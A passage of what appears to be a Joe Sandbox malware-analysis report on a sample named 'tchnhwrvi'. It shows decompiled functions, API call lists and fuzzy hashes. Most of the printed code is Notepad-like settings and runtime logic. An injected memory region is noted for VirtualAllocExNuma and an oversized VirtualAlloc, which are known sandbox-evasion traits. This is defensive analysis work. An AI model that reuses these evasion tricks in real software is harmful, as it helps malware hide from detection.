				E00283D50(__ebx, __edi, __esi);
				_t28 =  *((intOrPtr*)(_t26 + 8));
				_t29 = _t28 != 0;
				if(_t28 != 0) {
					E00283652( *((intOrPtr*)(_t26 + 8)));
					_t5 = _t26 - 4;
					 *_t5 =  *(_t26 - 4) & 0x00000000;
					__eflags =  *_t5;
					_t15 = E002830DC( *((intOrPtr*)(_t26 + 8))); // executed
					 *(_t26 - 0x1c) = _t15;
					 *(_t26 - 4) = 0xfffffffe;
					E002832CB();
					_t17 =  *(_t26 - 0x1c);
				} else {
					 *((intOrPtr*)(E00283CF8(_t29))) = 0x16;
					_t17 = E00283CA6() | 0xffffffff;
				}
				return E00283D95(_t17);
			}







                    0x00283270
                    0x00283272
                    0x00283277
                    0x0028327e
                    0x00283284
                    0x00283286
                    0x002832a0
                    0x002832a6
                    0x002832a6
                    0x002832a6
                    0x002832ad
                    0x002832b3
                    0x002832b6
                    0x002832bd
                    0x002832c2
                    0x00283288
                    0x0028328d
                    0x00283298
                    0x00283298
                    0x002832ca

                    APIs
                    • __lock_file.LIBCMT ref: 002832A0
                    • __ftell_nolock.LIBCMT ref: 002832AD
                      • Part of subcall function 00283CF8: __getptd_noexit.LIBCMT ref: 00283CF8
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: __ftell_nolock__getptd_noexit__lock_file
                    • String ID:
                    • API String ID: 2999321469-0
                    • Opcode ID: da310b7aec220e14de07f9806e15a2cfb21d8b3b1d62843db14101d88a46fbfa
                    • Instruction ID: 137705a221588c4ce1ae092668c335b9449a54fba8202f34c968e73b62f953d1
                    • Opcode Fuzzy Hash: da310b7aec220e14de07f9806e15a2cfb21d8b3b1d62843db14101d88a46fbfa
                    • Instruction Fuzzy Hash: 79F03039523205EADB10FF74CC0679D3AA0AF01B61F208225F824A90E5DB748B719F01
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 005F0F1D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 005F0EBF: GetSystemInfo.KERNELBASE(?), ref: 005F0EDC
                    • VirtualAllocExNuma.KERNELBASE(00000000), ref: 005F0F82
                    Memory Dump Source
                    • Source File: 00000001.00000002.308878721.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5f0000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: AllocInfoNumaSystemVirtual
                    • String ID:
                    • API String ID: 449148690-0
                    • Opcode ID: 02fd5776a212e4e28df96bd92848bb9bff485d1fd05fc97cd13e01601c6e9ece
                    • Instruction ID: cb0cf9fa437dd2fbceb29a5761732aa66d46779433c7fb2d7f00a896cca2c57d
                    • Opcode Fuzzy Hash: 02fd5776a212e4e28df96bd92848bb9bff485d1fd05fc97cd13e01601c6e9ece
                    • Instruction Fuzzy Hash: 4CF0E170E4430EBAEB207BF0490E77D7E6CBF80301F546955B7046A1C3DE7C56004665
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00282D3E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 536 282d3e-282d54 call 282c80
                    C-Code - Quality: 25%
                    			E00282D3E(intOrPtr _a4, intOrPtr _a8) {
				void* __ebp;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t9;

				_push(0x40);
				_push(_a8);
				_push(_a4);
				_t3 = E00282C80(_t4, _t5, _t6, _t9); // executed
				return _t3;
			}









                    0x00282d43
                    0x00282d45
                    0x00282d48
                    0x00282d4b
                    0x00282d54

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: __wfsopen
                    • String ID:
                    • API String ID: 197181222-0
                    • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                    • Instruction ID: e24709ad601df7f3b306a2815c1c74b4b7b40c9a020381d0239680f03d6b6ae2
                    • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                    • Instruction Fuzzy Hash: 4DC09B7644010C77CF112942EC06E593F59D7C0764F058011FB1C191619573D5759685
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00286758 Relevance: 1.5, APIs: 1, Instructions: 3COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • RtlEncodePointer.NTDLL(00000000,0028A1B8,00295228,00000314,00000000,?,?,?,?,?,00286199,00295228,Microsoft Visual C++ Runtime Library,00012010), ref: 0028675A
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: EncodePointer
                    • String ID:
                    • API String ID: 2118026453-0
                    • Opcode ID: dc997dafe1257d8eb0c03e11c7218a55c38ddadb6d9cd29f433b09016a784d5c
                    • Instruction ID: 919f0ec61876a3b9223f87cf77f9dc61ab442555404c466ac92d52f71c0a359f
                    • Opcode Fuzzy Hash: dc997dafe1257d8eb0c03e11c7218a55c38ddadb6d9cd29f433b09016a784d5c
                    • Instruction Fuzzy Hash:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 005F0E1F Relevance: 1.3, APIs: 1, Instructions: 60memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,17D78400,00003000,00000004), ref: 005F0E5C
                    Memory Dump Source
                    • Source File: 00000001.00000002.308878721.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5f0000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: e81709d29aeacffc972b816f3e2c3b8ecd6306ca993244f022616891f9074ab1
                    • Instruction ID: d70fcdc4216b694d13596e10d25808f6d10743b99d4d9e1b052c48bb8b4a62cc
                    • Opcode Fuzzy Hash: e81709d29aeacffc972b816f3e2c3b8ecd6306ca993244f022616891f9074ab1
                    • Instruction Fuzzy Hash: 1E113670D0021CEFDB00EBA8CD49BBEBBB8BB04304F645895EA40B7292D6794A448B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 00282200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 115memorywindowstringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00282200(intOrPtr _a4) {
				void* _v8;
				int _v12;
				void* _t24;
				void* _t30;
				int _t35;
				void* _t43;
				void* _t58;
				int _t60;
				intOrPtr _t61;
				void* _t65;

				_v12 = lstrlenW( *(_a4 + 0x10));
				SendMessageW( *0x2970ec, 0xb1, 0, 0);
				_t4 = GetWindowTextLengthW( *0x2970ec) + 1; // 0x1
				_t60 = _t4;
				_t24 = HeapAlloc(GetProcessHeap(), 0, _t60 + _t60);
				_t58 = _t24;
				if(_t58 == 0) {
					L12:
					return _t24;
				} else {
					do {
						GetWindowTextW( *0x2970ec, _t58, _t60);
						SendMessageW( *0x2970ec, 0xb0, 0,  &_v8);
						_t61 = _a4;
						_t30 = ( *(_t61 + 0xc) & 0x00000005) - 1;
						if(_t30 == 0) {
							goto L6;
						} else {
							_t24 = _t30 - 4;
							if(_t24 != 0) {
								goto L12;
							} else {
								_t65 = _v8 -  ~_t58;
								L6:
								if(_t65 == 0) {
									_v8 = 0xffffffff;
								}
								HeapFree(GetProcessHeap(), 0, _t58);
								_t35 = _v8;
								if(_t35 == 0xffffffff) {
									return SendMessageW( *0x2970ec, 0xb1, 0, 0);
								}
								goto L9;
							}
						}
						goto L13;
						L9:
						SendMessageW( *0x2970ec, 0xb1, _t35, _t35 + _v12);
						SendMessageW( *0x2970ec, 0xc2, 1,  *(_t61 + 0x14));
						_t16 = GetWindowTextLengthW( *0x2970ec) + 1; // 0x1
						_t60 = _t16;
						_t43 = HeapAlloc(GetProcessHeap(), 0, _t60 + _t60);
						_t58 = _t43;
					} while (_t58 != 0);
					return _t43;
				}
				L13:
			}













                    0x0028222c
                    0x0028222f
                    0x0028223d
                    0x0028223d
                    0x0028224d
                    0x00282253
                    0x00282257
                    0x0028233d
                    0x0028233d
                    0x00282260
                    0x00282260
                    0x00282269
                    0x00282281
                    0x00282283
                    0x0028228c
                    0x0028228d
                    0x00000000
                    0x0028228f
                    0x0028228f
                    0x00282292
                    0x00000000
                    0x00282298
                    0x0028229c
                    0x002822a8
                    0x002822a8
                    0x002822aa
                    0x002822aa
                    0x002822bd
                    0x002822c3
                    0x002822c9
                    0x00000000
                    0x00282335
                    0x00000000
                    0x002822c9
                    0x00282292
                    0x00000000
                    0x002822cb
                    0x002822de
                    0x002822f2
                    0x00282300
                    0x00282300
                    0x0028230c
                    0x00282312
                    0x00282314
                    0x00282322
                    0x00282322
                    0x00000000

                    APIs
                    • lstrlenW.KERNEL32(?), ref: 00282210
                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0028222F
                    • GetWindowTextLengthW.USER32(?), ref: 00282237
                    • GetProcessHeap.KERNEL32(00000000), ref: 00282246
                    • HeapAlloc.KERNEL32(00000000), ref: 0028224D
                    • GetWindowTextW.USER32 ref: 00282269
                    • SendMessageW.USER32(?,000000B0,00000000,?), ref: 00282281
                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002822BA
                    • HeapFree.KERNEL32(00000000), ref: 002822BD
                    • SendMessageW.USER32(?,000000B1,?), ref: 002822DE
                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 002822F2
                    • GetWindowTextLengthW.USER32(?), ref: 002822FA
                    • GetProcessHeap.KERNEL32(00000000), ref: 00282309
                    • HeapAlloc.KERNEL32(00000000), ref: 0028230C
                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00282335
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Heap$MessageSend$ProcessTextWindow$AllocLength$Freelstrlen
                    • String ID: Oqt
                    • API String ID: 3644332920-2617001805
                    • Opcode ID: 6cf8f58e82c58e0990c099f4d32a03d8eba7347ebfce06e0df65c9f23261b0f8
                    • Instruction ID: ac731161e8f10dc9904bad2bd5f6fb28fcc837cc38ef852e3bab359230ced980
                    • Opcode Fuzzy Hash: 6cf8f58e82c58e0990c099f4d32a03d8eba7347ebfce06e0df65c9f23261b0f8
                    • Instruction Fuzzy Hash: 3B318076610309EFD710DFA4EC8DF6AB778EB88714F50810AF909972E0CA71E905CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 002879C4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 85%
                    			E002879C4(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x294288; // 0x70fbf70a
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x295d30 = _t6;
				 *0x295d2c = _t22;
				 *0x295d28 = _t25;
				 *0x295d24 = _t21;
				 *0x295d20 = _t27;
				 *0x295d1c = _t26;
				 *0x295d48 = ss;
				 *0x295d3c = cs;
				 *0x295d18 = ds;
				 *0x295d14 = es;
				 *0x295d10 = fs;
				 *0x295d0c = gs;
				asm("pushfd");
				_pop( *0x295d40);
				 *0x295d34 =  *_t31;
				 *0x295d38 = _v0;
				 *0x295d44 =  &_a4;
				 *0x295c80 = 0x10001;
				_t11 =  *0x295d38; // 0x0
				 *0x295c34 = _t11;
				 *0x295c28 = 0xc0000409;
				 *0x295c2c = 1;
				_t12 =  *0x294288; // 0x70fbf70a
				_v812 = _t12;
				_t13 =  *0x29428c; // 0x8f0408f5
				_v808 = _t13;
				 *0x295c78 = IsDebuggerPresent();
				_push(1);
				E002879BC(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter("(\)");
				if( *0x295c78 == 0) {
					_push(1);
					E002879BC(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                    0x002879c4
                    0x002879c4
                    0x002879c4
                    0x002879c4
                    0x002879c4
                    0x002879c4
                    0x002879c4
                    0x002879ca
                    0x002879cc
                    0x002879cc
                    0x0028ac4a
                    0x0028ac4f
                    0x0028ac55
                    0x0028ac5b
                    0x0028ac61
                    0x0028ac67
                    0x0028ac6d
                    0x0028ac74
                    0x0028ac7b
                    0x0028ac82
                    0x0028ac89
                    0x0028ac90
                    0x0028ac97
                    0x0028ac98
                    0x0028aca1
                    0x0028aca9
                    0x0028acb1
                    0x0028acbc
                    0x0028acc6
                    0x0028accb
                    0x0028acd0
                    0x0028acda
                    0x0028ace4
                    0x0028ace9
                    0x0028acef
                    0x0028acf4
                    0x0028ad00
                    0x0028ad05
                    0x0028ad07
                    0x0028ad0f
                    0x0028ad1a
                    0x0028ad27
                    0x0028ad29
                    0x0028ad2b
                    0x0028ad30
                    0x0028ad44

                    APIs
                    • IsDebuggerPresent.KERNEL32 ref: 0028ACFA
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0028AD0F
                    • UnhandledExceptionFilter.KERNEL32((\)), ref: 0028AD1A
                    • GetCurrentProcess.KERNEL32(C0000409), ref: 0028AD36
                    • TerminateProcess.KERNEL32(00000000), ref: 0028AD3D
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                    • String ID: (\)
                    • API String ID: 2579439406-2644722814
                    • Opcode ID: 79c1b763d1e6295de655ba4577400732bd1d13d37f295083e9f6f46fd72ae7b8
                    • Instruction ID: 9620e6606564b849e26227014aa917bb265010fab49c45915e8257f0604a37a4
                    • Opcode Fuzzy Hash: 79c1b763d1e6295de655ba4577400732bd1d13d37f295083e9f6f46fd72ae7b8
                    • Instruction Fuzzy Hash: EF21B574A11B28DFD746EF69FC8D6483BB4BB48314F50441BE908973B0E7B059818F65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00285D3D Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00285D3D() {

				SetUnhandledExceptionFilter(E00285CFB);
				return 0;
			}



                    0x00285d42
                    0x00285d4a

                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(Function_00005CFB), ref: 00285D42
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 737f6da160a6cd411d3faacc935d05ed99bca8f4e6618e33a3cfb4fc0a1a54ad
                    • Instruction ID: fec061953adea3afa956e993ede28e39278b5b0e52b742e8dd106bb2ab45449a
                    • Opcode Fuzzy Hash: 737f6da160a6cd411d3faacc935d05ed99bca8f4e6618e33a3cfb4fc0a1a54ad
                    • Instruction Fuzzy Hash: 8E9002742626184AC65427706C8E5067A905A4A70674244536445C4494DBA044515A55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 005F017B Relevance: .1, Instructions: 60COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.308878721.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5f0000_tchnhwrvi.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                    • Instruction ID: c0f60065fa6f09f5be140be15ffca892e025ade8d5183204ad7df17cf4a70c3b
                    • Opcode Fuzzy Hash: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                    • Instruction Fuzzy Hash: EF11A036600119AFC720EF69C884DBABBE9FF547A47088015FD55CB252E338ED81C764
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 005F013E Relevance: .0, Instructions: 26COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.308878721.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5f0000_tchnhwrvi.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                    • Instruction ID: af42c075d1253dd16f145a27aaf7b9bfceb0ba95131701d434892d3732955da5
                    • Opcode Fuzzy Hash: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                    • Instruction Fuzzy Hash: 03E09235264149EFCB00CBA8CD45D35B3F8FB08320B180690F915C73E1E638ED00D650
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 005F0109 Relevance: .0, Instructions: 23COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.308878721.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5f0000_tchnhwrvi.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                    • Instruction ID: b1a56155d9af72e3844c71132895c41c1e3339588fed41611b62442a3ef64cb8
                    • Opcode Fuzzy Hash: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                    • Instruction Fuzzy Hash: A5E04F326506189BC7719B59CC44DA6FBE8FB887B0B5D5825EE4997652C234FC01C790
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 005F005F Relevance: .0, Instructions: 7COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000001.00000002.308878721.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5f0000_tchnhwrvi.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                    • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                    • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                    • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00281290 Relevance: 103.6, APIs: 32, Strings: 27, Instructions: 328registrystringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 98%
                    			E00281290() {
				void* _v8;
				char _v12;
				char _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				struct _WINDOWPLACEMENT _v64;
				long _t80;
				int _t126;
				char _t173;
				char _t174;
				intOrPtr _t175;
				intOrPtr _t177;
				signed int _t194;

				_t80 = RegCreateKeyExW(0x80000001, L"Software\\Microsoft\\Notepad", 0, 0, 0, 0xf003f, 0,  &_v8,  &_v20);
				if(_t80 == 0) {
					_v64.length = 0x2c;
					GetWindowPlacement( *0x2970e4,  &_v64);
					 *0x295f70 = _v28;
					 *0x295f68 = _v64.rcNormalPosition;
					 *0x295f74 = _v24;
					 *0x295f6c = _v32;
					_v12 =  *0x29715c;
					RegSetValueExW(_v8, L"fWrap", 0, 4,  &_v12, 4);
					_t173 =  *0x295f68; // 0x0
					_v12 = _t173;
					RegSetValueExW(_v8, L"iWindowPosX", 0, 4,  &_v12, 4);
					_t174 =  *0x295f6c; // 0x0
					_v12 = _t174;
					RegSetValueExW(_v8, L"iWindowPosY", 0, 4,  &_v12, 4);
					_t175 =  *0x295f70; // 0x0
					_v12 = _t175 -  *0x295f68;
					RegSetValueExW(_v8, L"iWindowPosDX", 0, 4,  &_v12, 4);
					_t177 =  *0x295f74; // 0x0
					_v12 = _t177 -  *0x295f6c;
					RegSetValueExW(_v8, L"iWindowPosDY", 0, 4,  &_v12, 4);
					_v12 =  *0x297117 & 0x000000ff;
					RegSetValueExW(_v8, L"lfCharSet", 0, 4,  &_v12, 4);
					_v12 =  *0x297119 & 0x000000ff;
					RegSetValueExW(_v8, L"lfClipPrecision", 0, 4,  &_v12, 4);
					_v12 =  *0x297108;
					RegSetValueExW(_v8, L"lfEscapement", 0, 4,  &_v12, 4);
					_v12 =  *0x297114 & 0x000000ff;
					RegSetValueExW(_v8, L"lfItalic", 0, 4,  &_v12, 4);
					_v12 =  *0x29710c;
					RegSetValueExW(_v8, L"lfOrientation", 0, 4,  &_v12, 4);
					_v12 =  *0x297118 & 0x000000ff;
					RegSetValueExW(_v8, L"lfOutPrecision", 0, 4,  &_v12, 4);
					_v12 =  *0x29711b & 0x000000ff;
					RegSetValueExW(_v8, L"lfPitchAndFamily", 0, 4,  &_v12, 4);
					_v12 =  *0x29711a & 0x000000ff;
					RegSetValueExW(_v8, L"lfQuality", 0, 4,  &_v12, 4);
					_v12 =  *0x297116 & 0x000000ff;
					RegSetValueExW(_v8, L"lfStrikeOut", 0, 4,  &_v12, 4);
					_v12 =  *0x297115 & 0x000000ff;
					RegSetValueExW(_v8, L"lfUnderline", 0, 4,  &_v12, 4);
					_v12 =  *0x297110;
					RegSetValueExW(_v8, L"lfWeight", 0, 4,  &_v12, 4);
					_v12 =  *0x297e50;
					RegSetValueExW(_v8, L"iMarginTop", 0, 4,  &_v12, 4);
					_v12 =  *0x297e54;
					RegSetValueExW(_v8, L"iMarginBottom", 0, 4,  &_v12, 4);
					_v12 =  *0x297e58;
					RegSetValueExW(_v8, L"iMarginLeft", 0, 4,  &_v12, 4);
					_v12 =  *0x297e5c;
					RegSetValueExW(_v8, L"iMarginRight", 0, 4,  &_v12, 4);
					_t194 =  *0x2970f8;
					_v12 = _t194;
					RegSetValueExW(_v8, L"bStatusBar", 0, 4,  &_v12, 4);
					_t126 = E00281020();
					asm("cdq");
					_v16 = MulDiv(( *0x297100 ^ _t194) - _t194, 0x2d0, _t126);
					RegSetValueExW(_v8, L"iPointSize", 0, 4,  &_v16, 4);
					RegSetValueExW(_v8, L"lfFaceName", 0, 1, 0x29711c, lstrlenW(0x29711c) + _t133);
					RegSetValueExW(_v8, L"szHeader", 0, 1, 0x297e60, lstrlenW(0x297e60) + _t136);
					RegSetValueExW(_v8, L"szTrailer", 0, 1, 0x298068, lstrlenW(0x298068) + _t139);
					return RegCloseKey(_v8);
				}
				return _t80;
			}


















                    0x002812b5
                    0x002812bd
                    0x002812cf
                    0x002812d6
                    0x002812ed
                    0x002812f8
                    0x00281303
                    0x0028130c
                    0x0028131e
                    0x00281321
                    0x00281326
                    0x0028133c
                    0x0028133f
                    0x00281344
                    0x0028135a
                    0x0028135d
                    0x0028135f
                    0x0028137e
                    0x00281381
                    0x00281383
                    0x002813a2
                    0x002813a5
                    0x002813b6
                    0x002813c4
                    0x002813e0
                    0x002813e3
                    0x002813fe
                    0x00281401
                    0x0028141d
                    0x00281420
                    0x0028143b
                    0x0028143e
                    0x0028145a
                    0x0028145d
                    0x00281479
                    0x0028147c
                    0x00281498
                    0x0028149b
                    0x002814b7
                    0x002814ba
                    0x002814d6
                    0x002814d9
                    0x002814f4
                    0x002814f7
                    0x00281512
                    0x00281515
                    0x00281530
                    0x00281533
                    0x0028154e
                    0x00281551
                    0x0028156c
                    0x0028156f
                    0x00281571
                    0x00281577
                    0x0028158d
                    0x0028158f
                    0x0028159a
                    0x002815b5
                    0x002815c1
                    0x002815e5
                    0x00281603
                    0x00281621
                    0x00000000
                    0x0028162e
                    0x00281632

                    APIs
                    • RegCreateKeyExW.ADVAPI32(80000001,Software\Microsoft\Notepad,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 002812B5
                    • GetWindowPlacement.USER32(?,?), ref: 002812D6
                    • RegSetValueExW.ADVAPI32(?,fWrap,00000000,00000004,?,00000004), ref: 00281321
                    • RegSetValueExW.ADVAPI32(?,iWindowPosX,00000000,00000004,?,00000004), ref: 0028133F
                    • RegSetValueExW.ADVAPI32(?,iWindowPosY,00000000,00000004,?,00000004), ref: 0028135D
                    • RegSetValueExW.ADVAPI32(?,iWindowPosDX,00000000,00000004,?,00000004), ref: 00281381
                    • RegSetValueExW.ADVAPI32(?,iWindowPosDY,00000000,00000004,?,00000004), ref: 002813A5
                    • RegSetValueExW.ADVAPI32(?,lfCharSet,00000000,00000004,?,00000004), ref: 002813C4
                    • RegSetValueExW.ADVAPI32(?,lfClipPrecision,00000000,00000004,?,00000004), ref: 002813E3
                    • RegSetValueExW.ADVAPI32(?,lfEscapement,00000000,00000004,?,00000004), ref: 00281401
                    • RegSetValueExW.ADVAPI32(?,lfItalic,00000000,00000004,?,00000004), ref: 00281420
                    • RegSetValueExW.ADVAPI32(?,lfOrientation,00000000,00000004,?,00000004), ref: 0028143E
                    • RegSetValueExW.ADVAPI32(?,lfOutPrecision,00000000,00000004,?,00000004), ref: 0028145D
                    • RegSetValueExW.ADVAPI32(?,lfPitchAndFamily,00000000,00000004,?,00000004), ref: 0028147C
                    • RegSetValueExW.ADVAPI32(?,lfQuality,00000000,00000004,?,00000004), ref: 0028149B
